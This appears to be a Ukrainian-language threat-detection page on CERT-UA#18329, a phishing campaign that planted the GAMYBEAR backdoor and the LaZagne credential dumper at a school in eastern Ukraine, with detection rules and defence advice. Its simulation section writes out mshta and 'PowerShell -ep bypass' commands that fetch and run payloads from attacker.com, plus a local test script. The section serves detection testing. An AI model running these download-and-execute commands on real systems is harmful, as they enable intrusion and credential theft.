Цілеспрямована кібер-атака на школу в східній Україні з використанням інструменту GAMYBEAR (CERT-UA#18329)
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Кампанія зі збору облікових даних вразила школи та державні установи у Сумській області через фішинговий електронний лист зі вкладенням у форматі ZIP. Відкриття архіву викликало файл HTA через mshta утиліту, яка потім завантажила скрипти PowerShell для розгортання бекдору GAMYBEAR та дампера облікових даних LaZagne, встановила C2 на основі HTTP і ексфільтрацію файлів із цільових директорій.
Аналіз атаки
CERT-UA зв’язала початкове порушення з фішинговим повідомленням, надісланим 26 травня 2025 року з викраденого облікового запису Gmail, надавши деталі кампанії в сповіщенні CERT-UA#18329. Судова експертиза виявила багатоступінчастий ланцюг зараження: ZIP → HTA → update.js → PowerShell → GAMYBEAR у супроводі зловмисного ПЗ LaZagne, з підтримкою стійкості через запис у реєстрі Run та періодичні завантаження з зловмисних URL.
Захист
Забезпечте багатофакторну аутентифікацію для всіх облікових записів електронної пошти, блокуйте виконання HTA та ненадійних скриптів PowerShell, закрийте ключ реєстру Run та впровадьте білий список додатків. Постійно оновлюйте правила виявлення на кінцевих точках, щоб розпізнавати зазначені імена файлів, хеши та мережеві індикатори.
Відповідь
Негайно ізолюйте уражені кінцеві точки, скиньте скомпрометовані облікові дані Gmail, зберіть всі визначені ІОС та проведіть комплексну перевірку на наявність GAMYBEAR, LaZagne та супутніх артефактів. Повідомте CERT-UA про інцидент та розповсюдьте ІОС через відповідні канали обміну кіберзагрозами.
Потік Атаки
Виявлення
Виявлення комунікації GAMYBEAR C2 [Мережеве з’єднання Windows]
Переглянути
Виявлення виконання бекдору GAMYBEAR [Подія файлу Windows]
Переглянути
Виявлення mshta.exe та виконання PowerShell з обхідним [Створення процесу Windows]
Переглянути
Ідентифікатори (HashSha1) для виявлення: Кібератака на освітній заклад на сході України з використанням інструмента GAMYBEAR (CERT-UA#18329)
Переглянути
Ідентифікатори (DestinationIP) для виявлення: Кібератака на освітній заклад на сході України з використанням інструмента GAMYBEAR (CERT-UA#18329)
Переглянути
Симуляції
Виконання симуляції
Передумова: Перевірка телеметрії та базової лінії повинна бути успішно пройдена.
Обґрунтування: Цей розділ детально описує точне виконання техніки супротивника (TTP), розроблене для виклику правила виявлення. Команди та наратив мають безпосередньо відображати виявлені TTP та націлені на створення точної телеметрії, очікуваної логікою виявлення.
-
Опис атаки та команди:
-
Етап 1 – Розгортання зловмисного HTA: Нападник розміщує
evil.htaна скомпрометованому веб-сервері. -
Етап 2 – Виконання через
mshta.exe: Використовуючи командний рядок Windows, нападник запускаєmshta.exe http://attacker.com/evil.hta. Це створює подію створення процесу зmshta.exeу командному рядку, задовольняючи перший пункт правила. -
Етап 3 – Обхід PowerShell: Щоб виконати корисне навантаження, яке обходить політику виконання системи, нападник запускає PowerShell з прапором
-ep bypass:PowerShell -ep bypass -Command "Invoke-WebRequest http://attacker.com/payload.ps1 -OutFile $env:TEMPp.ps1; & $env:TEMPp.ps1"Це генерує другу подію створення процесу, що містить точний рядок
PowerShell -ep bypass, задовольняючи другий пункт.
-
-
Скрипт регресивного тестування: Наведений нижче PowerShell скрипт відтворює вищезгадані кроки в автоматизованій, повторюваній манері.
# ------------------------------------------------- # Регресивний тест – Виклик Sigma Rule для mshta та PowerShell -ep bypass # ------------------------------------------------- # Змінні – налаштуйте для вашого лабораторного середовища $htaUrl = "http://127.0.0.1/evil.hta" # Повинен вказувати на досяжний файл HTA $psUrl = "http://127.0.0.1/payload.ps1" # Простий PS-пейлоад (наприклад, `Write-Host "pwned"`) # 1. Виклик mshta.exe Write-Host "[*] Запуск mshta.exe з параметром $htaUrl" Start-Process -FilePath "mshta.exe" -ArgumentList $htaUrl -NoNewWindow # Коротка пауза для забезпечення реєстрації процесу Start-Sleep -Seconds 2 # 2. Виклик PowerShell з обходом політики виконання $psCmd = "Invoke-WebRequest $psUrl -UseBasicParsing -OutFile $env:TEMPp.ps1; & $env:TEMPp.ps1" Write-Host "[*] Запуск PowerShell -ep bypass" Start-Process -FilePath "powershell.exe" -ArgumentList "-ep bypass -Command `"$psCmd`"" -NoNewWindow # Пауза для дозволу реєстрації Start-Sleep -Seconds 5 Write-Host "[+] Тест завершено. Перевірте ваш SIEM на наявність попереджень." -
Команди очищення: Видаліть тимчасові файли та завершіть будь-які завислі процеси тестування.
# Вилучення тимчасового пейлоаду Remove-Item -Path "$env:TEMPp.ps1" -ErrorAction SilentlyContinue # Додатково завершити процеси mshta або PowerShell, створені тестом Get-Process -Name mshta, powershell -ErrorAction SilentlyContinue | Where-Object { $_.Id -ne $PID } | Stop-Process -Force